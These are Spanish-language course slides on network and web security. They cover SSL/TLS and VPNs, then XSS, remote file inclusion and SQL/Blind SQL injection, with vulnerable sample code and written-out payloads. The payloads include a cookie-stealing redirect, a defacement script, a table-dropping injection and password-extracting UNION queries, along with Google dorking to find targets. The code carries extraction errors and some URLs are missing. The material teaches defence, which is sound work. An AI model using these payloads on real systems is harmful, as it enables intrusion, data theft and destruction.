52 Secure Sockets Layer (SSL; en español «capa de conexión segura») y su sucesor (evolución del mismo) Transport Layer Security (TLS; en español «seguridad de la capa de transporte») son protocolos criptográficos que proporcionan comunicaciones seguras por una red, comúnmente Internet. SSL/TLS proporciona autenticación y privacidad de la información entre extremos sobre Internet mediante el uso de criptografía. Habitualmente, sólo el servidor es autenticado (es decir, se garantiza su identidad) mientras que el cliente se mantiene sin autenticar. SSL/TLS se ejecuta en una capa entre los protocolos de aplicación como HTTP, SMTP, NNTP y sobre el protocolo de transporte TCP, que forma parte de la familia de protocolos TCP/IP. Aunque pueda proporcionar seguridad a cualquier protocolo que use conexiones de confianza (tal como TCP), se usa en la mayoría de los casos junto a HTTP para formar HTTPS. 52

53 El protocolo SSL/TSL se basa en tres fases básicas: Negociación: Los dos extremos de la comunicación (cliente y servidor) negocian que algoritmos criptográficos utilizarán para autenticarse y cifrar la información. Actualmente existen diferentes opciones: Para criptografía de clave pública: RSA, Diffie-Hellman, DSA (Digital Signature Algorithm). Para cifrado simétrico: RC2, RC4, IDEA (International Data Encryption Algorithm), DES (Data Encryption Standard), Triple DES o AES (Advanced Encryption Standard). Con funciones hash: MD5 o de la familia SHA. Autenticación y Claves: Los extremos se autentican mediante certificados digitales e intercambian las claves para el cifrado, según la negociación. Transmisión Segura: los extremos pueden iniciar el tráfico de información cifrada y autentica. 53

54 El protocolo SSL/TLS tiene multitud de aplicaciones en uso actualmente. La mayoría de ellas son versiones seguras de programas que emplean protocolos que no lo son. Hay versiones seguras de servidores y clientes de protocolos como el http, nntp, ldap, imap, pop3, etc. El protocolo SSL/TLS se ejecuta en una capa entre los protocolos de aplicación y TPC/IP como: HTTP sobre SSL/TLS es HTTPS, ofreciendo seguridad a páginas WWW para aplicaciones de comercio electronico, utilizando certificados de clave pública para verificar la identidad de los extremos. Visa, MasterCard, American Express y muchas de las principales instituciones financieras han aprobado SSL para el comercio sobre Internet. SSH utiliza SSL/TLS por debajo. SMTP y NNTP pueden operar también de manera segura sobre SSL/TLS. POP3 i IMAP4 sobre SSL/TLS son POP3S i IMAPS. 54

55 55

56 Existen diferentes implementaciones, como por ejemplo: OpenSSL: es una implementación de código abierto, la más utilizada. Es un proyecto desarrollado por la comunidad Open Source para libre descarga y está basado en SSLeay, que ayuda al sistema a implementar el SSL/TLS ofreciéndole un robusto paquete de herramientas de administración y librerías de criptografía que pueden ser usadas para OpenSSH y navegadores web (acceso seguro a HTTPS). GnuTLS: es una implementación de código abierto con licencia compatible con GPL. JSSE: es una implementación realizada en el Java incluida en el Java Runtime Environment. 56

57 Qué es VPN? VPN o "Virtual Private Network" es una tecnología de red que permite una extensión de la red local sobre una red pública o no controlada, como por ejemplo Internet. El ejemplo más común es la posibilidad de conectar dos o más sucursales de una empresa utilizando como vínculo Internet; también permitir a los miembros del equipo de soporte técnico la conexión desde su casa al centro de cómputos, o que un usuario pueda acceder a su equipo hogareño desde un sitio remoto, como por ejemplo un hotel. Todo esto utilizando la infraestructura de Internet. Para hacerlo posible de manera segura es necesario proveer los medios para garantizar la autenticación, integridad, confidencialidad de toda la comunicación y el no repudio. Autenticación y Autorización: Quién está del otro lado? Usuario/equipo y qué nivel de acceso debe tener. Integridad : La garantía de que los datos enviados no han sido alterados. Confidencialidad : Dado que los datos viajan a través de un medio hostil como Internet, los mismos son susceptibles de interceptación: por eso es fundamental el cifrado de los datos. De este modo, la información no debe poder ser interpretada por nadie más que los destinatarios de la misma. No repudio: los mensajes deben ir firmados 57

58 Tipos de VPN Básicamente existen tres arquitecturas de conexión VPN: VPN de acceso remoto: Este es quizás el modelo más usado actualmente y consiste en usuarios o proveedores que se conectan con la empresa desde sitios remotos (oficinas comerciales, domicilios, hoteles, aviones, etc.) utilizando Internet como vínculo de acceso. Una vez autenticados tienen un nivel de acceso muy similar al que tienen en la red local de la empresa. Muchas empresas han reemplazado con esta tecnología su infraestructura "dial-up" (módems y líneas telefónicas), aunque por razones de contingencia todavía conservan sus viejos modems... 58

59 VPN sitio-a-sitio Este esquema se utiliza para conectar oficinas remotas con la sede central de organización. El equipo central vpn, que posee un vinculo a Internet permanente, acepta las conexiones vía Internet provenientes de los sitios y establece el "túnel" vpn. Los servidores de las sucursales se conectan a Internet utilizando los servicios de su proveedor local de Internet, típicamente mediante conexiones de banda ancha. Esto permite eliminar los costosos vínculos punto a punto tradicionales, sobre todo en las comunicaciones internacionales. VPN Interna Este esquema es el menos difundido pero uno de los más poderosos para utilizar dentro de la empresa. Es una variante del tipo "acceso remoto" pero, en vez de utilizar Internet como medio de conexión, emplea la misma red Lan (Red de área local) de la empresa. Sirve para aislar zonas y servicios de la red Lan interna. Esta capacidad lo hace muy conveniente para mejorar las prestaciones de seguridad de las redes inalámbricas (WiFi). Un ejemplo clásico es un servidor con información sensible, como las nóminas de sueldos, ubicado detrás de un equipo VPN, el cual provee autenticación adicional más el agregado del cifrado, haciendo posible que sólo el personal de RRHH habilitado pueda acceder a la información. 59

60 Por qué VPN? Costos La principal motivación del uso y difusión de esta tecnología es la reducción de los costos de comunicaciones directos, tanto en líneas dial-up como en vínculos WAN dedicados. Los costos se reducen drásticamente en estos casos: En el caso de accesos remotos, llamadas locales a los ISP (Internet Service Provider) en vez de llamadas de larga distancia a los servidores de acceso remoto de la organización. O también mediante servicios de banda ancha. En el caso de Sitio-a-Sitio, utilizando servicios de banda ancha para acceder a Internet, y desde Internet llegar al servidor VPN de la organización. Todo esto a un costo sensiblemente inferior al de los vínculos Wan dedicados. Ancho de Banda Podemos encontrar otra motivación en el deseo de mejorar el ancho de banda utilizado en conexiones dial-up. Las conexiones vpn de banda ancha mejoran notablemente la capacidad del vínculo. 60

61 Las implementaciones Las distintas opciones disponibles en la actualidad caen en tres categorías básicas: soluciones de hardware, soluciones basadas en firewall y aplicaciones VPN por software. Cada tipo de implementación utiliza diversas combinaciones de protocolos para garantizar las tres características fundamentales mencionadas más arriba: Autenticación, Integridad y Confidencialidad. El protocolo estándar de hecho es el IPSEC, pero también tenemos PPTP, L2TP, SSL/TLS, SSH, etc. Cada uno con sus ventajas y desventajas en cuanto a seguridad, facilidad, mantenimiento y tipos de clientes soportados. Actualmente hay una línea de productos en crecimiento relacionada con el protocolo SSL/TLS, que intenta hacer más amigable la configuración y operación de estas soluciones. Las soluciones de hardware casi siempre ofrecen mayor rendimiento y facilidad de configuración, aunque no tienen la flexibilidad de las versiones por software. Dentro de esta familia tenemos a los productos de Cisco, Linksys, Netscreen, Symantec, Nokia, US Robotics. etc. En el caso basado en firewalls, se obtiene un nivel de seguridad alto por la protección que brinda el firewall, pero se pierde en rendimiento. Muchas veces se ofrece hardware adicional para procesar la carga vpn. Ejemplo Checkpoint NG, Cisco Pix. Las aplicaciones VPN por software son las más configurables, obviamente el rendimiento es menor y la configuración más delicada, porque se suma el sistema operativo y la seguridad del equipo en general. Aquí tenemos por ejemplo a las soluciones nativas de Windows, Linux y los Unix en general. Por ejemplo productos de código abierto (Open Source) como OpenSSH, OpenVPN y FreeS/Wan. 61

62 Qué duda cabe hoy en día de la importancia de Internet en muchos ámbitos de la vida, y especialmente a nivel comercial. Muchas empresas nacen y florecen alrededor de Internet, y se comunican a través de sus páginas web. Son los servidores web seguros? Pues bien, por desgracia lo son mucho menos de lo esperado y deseado por todos. En este apartado de la unidad de trabajo veremos hasta qué punto y de qué forma pueden obtenerse, cambiarse o incluso hacerse desaparecer contenidos web y datos sensibles de empresas e incluso en sitios gubernamentales. Quiénes son los responsables? Los responsables son los desarrolladores y administradores web que en algunos casos se empeñan en mantenerse ajenos a una realidad en la que hackers, lammers y scripkiddies (términos muy diferentes) andan a sus anchas, gracias a la falta de profesionalidad e interés de algunos programadores y webmasters. Puede que te este preguntado hasta qué punto un buen diseño de red podría mitigar los efectos de un ataque? Puede afirmarse que hasta el sistema mejor diseñado y más caro, en cuanto a la infraestructura de red y medios de defensa puede verse totalmente comprometido por un fallo de seguridad en la programación de una web. 62

63 Es muy importante tener el software completamente actualizado y auditado para evitar las posibles explotaciones de los bug que puedan tener. Esto deber hacerse partiendo de los sistemas operativos que soportan nuestro software, y hasta esas mismas aplicaciones web finales pasado por todos los puntos intermedios en la arquitectura software que puede encontrar en cualquier implementación de aplicaciones, como por ejemplo servidores web (Apache, IIS) o gestores de bases de datos como Mysql, Oracle, SQL Server, etc. Se tratarán diversos vectores de ataque conocidos como el XSS (Cross Site Scripting), RFI (Remote File Includer), LFI (Local File Includer), autenticación web (mediante scripts o bypass), SQL y Blind SQL inyection. Se verá cómo y por qué se producen, así como la forma de explotarlos para sacar partido de ellos. Por supuesto el objetivo no es este, sino, buscar las contramedidas necesarias para mitigar los ataques, y poder así asegurar sitios web. 63

64 NIKTO Nikto es un scanner de vulnerabilidades de servidores web bajo licencia GPL que permite obtener un informe detallado sobre un sitio web para poder evitar posibles ataques. Una de las ventajas de Nikto es la posibilidad de actualizarlo periódicamente. Con esto aumentamos la cantidad de ataques más comunes a un sitio web que podemos evitar. Las categorías de fallos que localiza Nikto son las siguientes: Problemas de configuración. Busca fallos en la configuración del servidor. Archivos y scripts por defecto. Detecta problemas en los programas que los servidores implementan por defecto. Archivos y scripts inseguros. Analiza el servidor web en busca de funcionalidades inseguras. Versiones desactualizadas de software. Permite detectar problemas y nos alerta de si alguna actualización del sistema debe ser instalada para evitar dejar abiertos nuevos agujeros. 64

65 La utilización de Nikto es muy sencilla. Tan sólo hay que tener instalado un intérprete de Perl en el sistema que entienda las órdenes que se realicen. Para empezar a utilizar la aplicación se teclea: nikto [-h destino] [opciones] donde -h indica el destino del escaneo y las opciones de ejecución de Nikto. A continuación se muestran algunos ejemplos para comprender mejor el funcionamiento de Nikto: Escaneo básico al servidor del host local: nikto.pl -h Un escaneo básico de un servidor web en el puerto 443, con encriptaci6n SSL que ignora la cabecera del servidor. Nikto no asume que el puerto 443 es SSL, pero si http falla, la aplicaci6n intentará hacerlo mediante HTTPS: nikto.pl -h p 443 s Escaneo múltiple de puertos en el servidor permitiendo a Nikto determinar si estamos ante encriptación HTTP y SSL. nikto.pl -h p

66 Http Analyzer Http Analyzer es un programa que permite actuar como Proxy entre el cliente y el servidor. Http Analyzer analiza en tiempo real las peticiones y respuestas que realizamos sobre una web. También permite construir paquetes que proporcionan multitud de métodos de intrusión en web, tales como SQL inject en los casos en que los textbox están filtrados y se han tomado otras medidas de seguridad. 66

67 Achilles Achilles es un programa similar a Http Analyzer. Su diferencia radica en que hace de Proxy intermedio interactuando con el navegador. Tanto es así, que el navegador se configure para que salga por Proxy sobre el puerto 5000 por defecto que usa achilles o cambiar este en la configuración para poner el que se desee. 67

68 XSS significa Cross Site Scripting, no lo abreviaron en CSS para no confundirlo con las hojas de estilo en cascada. A veces también se le llama HTML injection pero no es lo correcto, lo correcto es llamarle XSS o Cross Site Scripting. Esta vulnerabilidad compromete la seguridad del usuario y no la del servidor. Consiste en inyectar código HTML o JavaScript en una web, con el fin de que el navegador de un usuario ejecute el código inyectado al momento de ver la página alterada cuando accede a esta. Normalmente el XSS se utiliza para causar una acción indebida en el navegador de un cliente, pero dependiendo de la vulnerabilidad, puede explotar el fallo para causar una acción indebida en un servidor o en una aplicación. Esta limitación se debe a que el código HTML se interpreta en el navegador de un usuario y no en el servidor. Así que si alguien inyecta código HTML en alguna aplicación web no podría hacer daño al servidor, ya que éste no interpreta el código HTML, sólo los clientes. Por eso este ataque se denomina "ataque del lado del cliente". El XSS se puede utilizar para hacer phishing, robo de credenciales, "troyanizar" navegadores, o simplemente para hacer un "deface". Todo depende de la página web en concreto que se esté atacando. 68

69 Hay tres clases de XSS: Cross - site - scripting local: Se utiliza para ejecutar código remotamente con los permisos de otro usuario. La principal diferencia entre este tipo de ataque y los otros dos seria que la inyección se realiza a través de la URL pero no se incluye en el código de la página, sólo se ejecuta en el navegador. Este ataque podría utilizarse para enviar a alguien que tenga una web alojada un enlace malicioso. Cuando la victima pulsa sobre el enlace, la ejecución se realiza en el mismo navegador y con los mismos permisos que tiene la victima en su sistema. De este modo, puede realizar algún tipo de acción con los permisos del usuario. La página de la siguiente se utiliza para darle la bienvenida a algún usuario por su nombre, ejemplo: Esto mostraría algo como: "Hola juan Bienvenido a nuestra página" De cualquier modo, una petición del siguiente modo: hace que en el navegador ejecute el script alert("hola ") 69

70 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" " <html xmlns=" <head> <meta http-equiv="content-type" content="text/html; charset=iso " /> <title>documento sin título</title> </head> Hola <script language="javascript1.1"> var posicion=document.url.indexof("nombre=")+8; document.write(document.url.substring(posicion-1,document.url.length)); </script> Bienvenido a la página <body> </body> </html> 70

71 Permanente: Este tipo de vulnerabilidad se encuentra en foros, libros de visita y webs que se modifican por medio de formularios. Una vulnerabilidad como ésta se produce siempre que alguien entre en la parte del foro donde se ha inyectado el código y este se ejecuta en el navegador del cliente. Esta vulnerabilidad se utiliza frecuentemente para hacer un "deface" usando una etiqueta <div> que cubra toda la web o con un script que la redireccione a su sitio. La información proporcionada por el usuario es almacenada en la base de datos y se mostrará a los usuarios que visiten la página, por eso se dice que la vulnerabilidad "persiste. Las posibilidades que puede realizar son varias: Inyectar código que robe las cookies de todos los usuarios que lean el mensaje. Obteniendo un gran número de cuentas en el foro. Inyectar código que redireccione la página a una página externa, logrado hacer un deface. "Troyanizar" un gran número de navegadores de usuarios. 71

72 No permanente. Este tipo de XSS es muy fácil de encontrar en motores de búsqueda, formularios, URL, cookies, programas en Flash o incluso en videos. Esta vulnerabilidad es más difícil de utilizar ya que hay que conseguir que alguien entre en el enlace malicioso. El Cross Site Scripting no persistente tampoco parece ser un problema de seguridad muy serio, ya que la inyección sólo se puede realizar en páginas no estáticas. Pero como ya se ha dicho antes, si se sabe aprovechar la vulnerabilidad le puede dar gran utilidad. Con un poco de ingeniería social un atacante puede lograr que un usuario entre a una página que contiene código inyectado. Ya que para realizar este tipo de ataques se requiere ingeniería social, muchos programadores no le dan importancia a este bug. Este XSS es una vulnerabilidad y debe ser tomada como tal, se puede explotar y ser usada para dudosos fines. Cualquier programador que quiera tener programación segura debe considerar todas las posibilidades de violación. 72

73 El XSS no persistente es una vulnerabilidad no persistente porque la página con la inyección no es una página que verán todos los usuarios. Tampoco es una página que existe o se mantiene en el servidor, sólo se genera cuando un usuario proporciona cierta información a alguna aplicación. Se llama vulnerabilidad reflejada porque para realizar un ataque, el código inyectado primero pasa del navegador al servidor, y luego del servidor a otro navegador; como si fuera un reflejo. Tomemos como ejemplo un portal (por ejemplo, que tiene un sistema de autenticación de usuarios. Además, el sitio web tiene una aplicación que permite realizar búsquedas en la web y que es vulnerable a inyección de código: El atacante identifica a su victima. La victima tiene una cuenta en la web vulnerable: victima@ejemplo.es. Después el atacante forma una URL maligna, en la que inyecta código para guardar la cookie del usuario en su servidor. 73

74 location=' </script> Ejemplo (XSS): El link es enviado y se convence a la victima de que visite página. La victima visita la página, su navegador envía su cookie al servidor del atacante permitiéndole acceder en la cuenta de la victima. Imagine un buscador de texto dentro de una web en el que puede escribir un texto y la página web responde "Lo que hayas puesto no se ha encontrado, repita su búsqueda", donde pone "lo que hayas puesto" puede insertar etiquetas html como <h1>hola</h1> y si es vulnerable el navegador lo interpreta como parte del código HTML y saldría hola en letras grandes, pero en vez de poner "<h1>hola</h1>" puede insertar un código que robe las cookies de los clientes y las almacene en un servidor externo. Si la web pasa la variable del buscador mediante GET (es lo más cómodo) puede generar una URL maliciosa (por ejemplo, y hacer que alguien la utilice para robar las cookies. 74

75 A continuación puede ver un ejemplo más detallado: Paso 1. Creación de paginas que contienen vulnerabilidades de la web desde donde se envía el formulario: <HTML> <HEAD> <TITLE>Vulnerabilidad XSS</TITLE> </HEAD> <BODY> <BR> <FORM METHOD="get" ACTION="xss.php"> <INPUT TYPE="text' NAME="vuln"> <BR><BR> <INPUT TYPE="submit" VALUE="enviar"> </FORM> </BODY> </HTML> Ahora el código recibe las variables de este formulario (xss.php): <?php $var = $GET["vuln"]; echo "Has escrito: ".$var;?> 75

76 En el primer código hay que fijarse en la etiqueta <FORM METHOD= "get" ACTION= "xss.php"> donde el método GET significa que envía los datos a través de la URL y el método POST los envía sin usar la URL, action dice que le envía los datos a "xss.php ". La primera línea de código recoge los datos enviados a través de la variable vuln y se guardan en la variable var. $var = $GET[ vuln ]n; Y la segunda muestra en la web el contenido de la variable $var. echo Has escrito: ".$var; Este código escribe en pantalla "Has escrito:" seguido de la variable $var. Paso 2. Explotar la vulnerabilidad Si al inyectar el siguiente código aparece una ventana con el mensaje "hola", entonces el sitio web es vulnerable a la inyección de código. En este caso el código es inocuo, pero puede inyectarse cualquier cosa. <SCRIPT>alert("hola") ;</SCRIPT> 76

77 Otros métodos de XSS La inyección de código por medio de la URL consiste en modificar las variables que se envían mediante GET a otra página. Si la otra página los escribe por pantalla ya tenemos la vulnerabilidad. Por ejemplo: Código página index.html <HTML> <HEAD> <TITLE>Práctica XSS</TITLE> </HEAD> <BODY> <A HREF="xss.php?var=hola">HOLA</A> <A HREF="xss.php?var=adios">ADIOS</A> </BODY> </HTML> En el código no hay ningún formulario para inyectar texto, pero si que le pasa variables a través de la URL, así que puede modificar la variable var. Con la URL maliciosa sólo hace falta un poco de ingeniería social para enviársela a alguien para que ejecute el código en su navegador. que desea ejecutar Código xss.php <?php $bug = $_GET["var"]; echo "Has escrito: ".$bug;?> Para evitar los ataques XSS lo mejor es filtrar cualquier código HTML o script. Para ello bastará con eliminar los caracteres "<"y">". 77

78 El objetivo de estas dos técnicas es hacer que el servidor ejecute código malicioso. Por ejemplo, este tipo de ataques se suele utilizar mucho para que el servidor ejecute un shell web para obtener control total sobre el sistema

79 La diferencia entre ambas técnicas es que LFI consiste en subir el código malicioso en el propio servidor a través de foros, web de subida de ficheros, etc. Y RFI consiste en subir el fichero en el servidor remoto pera hacer que la victima sea la que ejecuta dicho código. La vulnerabilidad RFI (Remote File Inclusion) consiste en incluir archivos remotos en documentos hechos en php, jsp, asp. La función "include();" de php y sus homólogos en otros lenguajes servidor, permite incluir archivos dentro del mismo documento como si fuesen parte del texto. La función se puede usar de dos formas: include("web.html"); Así el documento no seria vulnerable porque no permite cambiar el archivo a incluir. include($variable); Esta es la forma vulnerable, ya que permite modificar la variable mediante la URL. 79

80 Esta vulnerabilidad no afecta solamente a la seguridad de los usuarios sino también la del servidor ya que permite modificar archivos de la página. Se suele encontrar en web que usan esta función en los enlaces. Por ejemplo, imagine una web que muestre la publicidad en la parte donde muestra el contenido principia y un menú. En el menú hay enlaces para moverse por el interior de la web, pero estos enlaces no elevan a otra web, lo que hacen es que cambian el valor de la variable de "include ($var);". Entonces puede modificar ese valor para incluir dentro un documento con el código deseado. Ejemplo Paso 1. Localización de sitios web vulnerables El primer paso es localizar un sitio web vulnerable utilizando un programa para tal efecto o examinando el código fuente. 80

81 Paso 2. Explotar la vulnerabilidad Una vez localizado el sitio web vulnerable hay que disponer de un servidor web donde incluir el código que desea ejecutar. El sitio web puede ser en un servidor nuestro o en un servidor anónimo. Para incluir un fichero se realiza de la siguiente forma: web.com/code.txt Como ha podido ver, se ha incluido un archivo.txt porque si se incluye un archivo.php se ejecutaría en nuestro servidor (algo no deseado) y no en el de la web vulnerable. El archivo podría contener por ejemplo: <?php echo "<hl>vulnerable a RFI</hl>";?> Evidentemente, puede ejecutar cualquier programa para hacer cualquier cosa en el servidor. Esta técnica es comúnmente utilizada por los hackers para efectuar defaces (cambiar el contenido de la web o incluir su firma). Para modificar un fichero sólo hay que crear un script que cambie el contenido de la página principal (por ejemplo, index.html), subirlo a un servidor web e incluirla dentro de la web vulnerable. A continuación, puede ver un ejemplo del código que modifica el fichero index.php 81

82 <?php $a= fopen("index.php","w"); $b = "<center><h1>vulnerable a XSS</h1></center>"; fwrite($a,$b);?> Para incluirlo solamente hay que ejecutar el script: Contramedidas w.miweb.com/code.txt Para evitar este tipo de ataques debe evitar que se suban ficheros en el servidor en ubicaciones donde Apache, tomcat.. tenga permisos de ejecución. 82

83 83

84 El lenguaje SQL (Structured Query Language) se utiliza para interactuar con bases de datos relacionales. Existen diferentes variantes de SQL. La mayoría de los dialectos de uso común en la actualidad están basados en SQL-92, el estándar ANSI más reciente. La unidad fundamental de ejecución en SQL es la consulta, la cual está formada por una colección de sentencias que, básicamente, devuelven un único resultado. Las sentencias SQL pueden modificar la estructura de la base de datos y manipular los contenidos. Se entiende por inyección SQL el hecho de insertar una serie de sentencias SQL en una consulta mediante la manipulación de la entrada de datos de una aplicación. Con la inyección SQL se puede conseguir validaciones de entrada, extracción, modificación de datos e incluso el compromiso total del servidor. Dadas las diferencias inherentes en los diferentes tipos de bases de datos y lenguajes, cada tipo de servidor tiene sus propias peculiaridades y métodos de inyección. A continuación se va a ver un ejemplo con la base de datos Access y con el lenguaje ASP: 84

85 Código - formulario de envió de datos <FORM ACTIM= login.asp METHOD= "post target= "derecha" > <B>Usuario:</B> <INPUT NANE="usuario" SIZE=111511> <BR> <B>Contraseña:</B> <INPUT TYPE="PASSWORD" NAME= clave SIZE="15'> <BR><INPUT TYPE="Submit" VALUE="login" ><BR> Código ASP Dim usu, pass, conexión, Rs, sql, conta, wsql usu= Trim(Request.Form("usuario")) pas = Trim(Request.Form("clave")) set conexion=server.createobj ect ("ADODB. Corrnection ) Ei ejemplo muestra el nombre y DNI del usuario coincidente con user y pass de la tabla cliente. La aplicación tiene que enviar los datos de las variables user y pass proporcionados por ei usuario, comprobar la coincidencia y devolver así el registro correcto en el caso de existir o el mensaje de error en caso de no encontrar coincidencias. conexion.open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Serve.MapPath ( "videoclub.mdb") sql = "SELECT * FROM CLIENTE WHERE NOMERE = & usu & AND PASS = & pas & set RS=conexion.execute (sql) If (RS.EOf = true) then response.redirect" error. asp" end if If (rs ("COD_PRIVILEGIO") =1) then Response.Write "Te logueaste con exito." response.write("<tr><td><center>"&rs("nombre")&"</center></ td>") response.wrrte ("<tr><td><center>"&rs ("DNI") &" euros</center></td>") end if 85

86 Como puede observar en el anterior código, la consulta no filtra el carácter apostrofo/comilla simple en el nombre de usuario ni en la contraseña, lo que implica que la página web es vulnerable a la inyección SQL. Ahora, para explotarlo necesita construir una nueva consulta a través de los parámetros de la consulta de validación de tal forma que siempre sea verdadera. SELECT * FROM CLIENTE WHERE NOMBRE = or 1 = 1 AND PASS = cualquier_cosa Como puede ver en la consulta siempre será cierta ya que siempre 1=1, por lo que se ejecutará y la base de datos devolverá resultados. 86

87 A continuación puede verse una serie de inyecciones SQL para la base de datos MYSQL: ';drop table Usuarios -- Elimina la tabla Usuarios. ' having 1=1-- Muestra el mensaje de error: Column 'Usuarios.Id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. A partir del mensaje de error se obtiene el nombre de la tabla y la primera columna de la tabla donde se está ejecutando. ' group by Usuarios.Id having 1=1-- Muestra el mensaje de error: Column Usuarios.Usuario is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Donde se obtiene la segunda columna del Query al igual que el nombre de la tabla. ' union select sum(usuario) from Usuarios-- Muestra el mensaje de error: Operand data type char is invalid for sum operator. Se obtiene el tipo de dato de la columna a la cual se quiere realizar el sumatorio. 87

88 ' union select Muestra el mensaje de error: Conversion failed when converting the nvarchar value 'Microsoft SQL Server (Intel X86) Mar :40:02 Copyright (c) Microsoft Corporation Standard Edition on Windows NT 5.1 (Build 2600: Service Pack 2) ' to data type int. 5 Se obtiene la versión de la base de datos. ' union select min(usuario),'1','1','1','1','1','1','1' from Usuarios where Usuario> 'a'-- Muestra el mensaje de error: Conversion failed when converting the varchar value inquil 1 to data type int. Se obtiene el nombre de un usuario que empiece o que la condición "a" sea la más cercana a los nombres de los usuarios de la tabla, que en el ejemplo el usuario es "inquil". ' union select Contraseña,1,1,1,1,1,1,1 from Usuarios where Usuario = 'inquil'-- Muestra el mensaje de error: Conversion failed when converting the nvarchar value 'inq1448 ' to data type int. Se obtiene el password del usuario indicado en la condición. 88

89 Las inyecciones SQL se pueden utilizar para validarse ilícitamente en un sistema, pero también pueden utilizarse para obtener información de las bases de datos, ver su estructura, modificarla, eliminarla, etc. Para ello se usan clausulas del tipo UNION o la inyección SQL ciega (Blind SQL). A continuación puede ver un ejemplo sencillo donde una página envía el login y el password de un usuario a otra página que se encarga de comprobar si los datos son correctos. Código gue envía datos $us=$ POST [ 'usuario' ]; $pas=$ POST [ 'pass' ]; if($get['usuario ] $GET['pass'I){ die('hack Attempt"); sql="select password FROM usuarios WHERE user = '$us'; Código gue recibe datos $resp = mysql_query($sql) or die(mysql_error()); if (mysql_fetch_array($resp)){ if($resp==$pas) { echo "Inicio de sesión correcto"; }else{ echo el password $resp es incorrecto ;}} 89

90 Para obtener la contraseña hay una instrucción en SQL llamada UNION, que sirve para obtener información de dos tablas. UNION necesita algunos requisitos. Introducir la misma cantidad de valores. Disponer de un informe de los errores que provocaremos en la instrucción Para empezar hay que tener en cuenta que la instrucción a modificar es la siguiente: SELECT password FROM usuarios WHERE user = '$us' Como ejemplo, si introduce el nombre de usuario auditor la instrucción queda de la siguiente forma: SELECT password FROM usuarios WHERE user = 'auditor' EL operador en SQL UNION necesita que el número de columnas sea igual, sino nos mostrará un error. Y exactamente, lo que necesita es un error, para saber cuando la consulta está bien o mal. El operador UNION se utiliza en el campo usuario, como por ejemplo, de la siguiente forma: usuario: ' AND 0 UNION SELECT 1 AND '1'=' SELECT password FROM usuarios WHERE user = ' ' AND 0 UNION SELECT 1 AND '1'=' ' 90

91 Para obtener la contraseña del usuario se va a realizar un ataque del BLIND SQL. El modo de funcionamiento de este tipo de ataque se basa en conseguir que los comandos se ejecuten con la desventaja de no poder visualizar el resultado. Esta falta de muestreo de resultados se produce por el tratamiento total de los códigos de error, y la imposibilidad de modificar, a priori, ninguna información de la base de datos. Pero, a pesar de todo eso, si que es posible conseguir información de la base de datos, modificando la información que se envía y viendo los cambios en las respuestas que se obtienen. El objetivo del Blind SQL es detectar esos cambios para poder averiguar la información extraída en función de esos cambios. Para eso, utilizaremos un vector de ataque basado en lógica booleana, o sea, verdadero o falso. Una sentencia en la SQL+ en la que los datos que se muestran cambian y una SQL0 en la que los datos que se muestran no cambian. A continuación puede ver un ejemplo: SQL0 and 1=1 SQL+ and 1=0 91

92 Cómo puede sacar más partido? Pues continuando con el ejemplo anterior, suponga que quiere saber si existe una determinada tabla: and exists (select * from usuarios) Si el resultado de la consulta sigue siendo la misma noticia con id=1, entonces existe la tabla. En el caso de que no sea así entonces sabrá que no existe la tabla o no tiene acceso a ella. Suponga que quiere llegar más lejos y quiere saber el nombre del usuario administrador de una base de datos MySQL: and 300>ASCII(substring(user(),1,1) Con esa última inyección obtiene si el valor ASCII de la primera letra del nombre del usuario es menor que 300 y por tanto puede concluir que es una SQL0. Evidentemente se pueden ir acotando valores para dar con el resituado correcto. Como es una tarea laboriosa el hecho de localizar y explotar una web vulnerable, existen diversas técnicas de automatización. 92

93 Absinthe es una potente herramienta que realiza de forma automatizada las consultas necesarias para obtener información mediante las acotaciones explicadas anteriormente. Veamos un ejemplo: En primer lugar hay que buscar en Google algo como: iurl:noticias.php?id=" con lo que le solicita a Google todas las páginas que contienen formatos de uri susceptibles a este tipo de ataque. En el ejemplo, se buscan las páginas con el nombre noticias.asp pero también puede buscar páginas del tipo news.asp, producto.jsp, etc. A continuación hay que probar mediante sentencias SQL0 y SQL+ si alguna de esas web es vulnerable. Si la web es vulnerable, para obtener las BD completas hay que realizar los siguientes pasos:

94 Iniciar el sistema Para comprender mejor el funcionamiento de Absinthe puede ver una serie de marcas numéricas para indicar los distintos apartados y opciones de la aplicación. 1. Permite indicar el tipo de base de datos objeto del ataque. Absinthe es capaz de trabajar con MS SQL Server, Oracle, PostgreSql y SysBase. 2. Escriba la web vulnerable que desea utilizar pero sin indicar el parámetro vulnerable ya que eso se hará en los puntos 3 y 4. Por ejemplo, si la web vulnerable es en el punto 2, hay que indicar: 1. Indique la variable vulnerable, que en ei ejemplo es id. 2. En default value indique el número de id de noticia por defecto de la página y con el que se probaron SQL+ y SQL0. En este caso Además debe activar la casilla Injectable parameter para después pulsar el botón Add parameter para que aparezca en el listado de parámetros 94

95 1. Introducción a los sistemas de seguridad en WLAN. 2. Rompiendo Redes Inalámbrica: Aircrarck-ng 3. Minidwep-gtk (Live Wifiway 2.0) 4. Servidor de Autenticaciones RADIUS Sw: freeradius Recomendaciones de Seguridad WLAN 95

96 En los últimos años ha irrumpido con fuerza, en el sector de las redes locales, las comunicaciones inalámbricas, también denominadas wireless. La tecnología inalámbrica ofrece muchas ventajas en comparación con las tradicionales redes conectadas por cable. Una de las principales ventajas es la capacidad de brindar conectividad en cualquier momento y lugar, es decir mayor disponibilidad y acceso a redes. La instalación de la tecnología inalámbrica es simple y económica. El coste de dispositivos inalámbricos domésticos y comerciales continúa disminuyendo. La tecnología inalámbrica permite que las redes se amplíen fácilmente, sin limitaciones de conexiones de cableado, por lo que es fácilmente escalable. 96

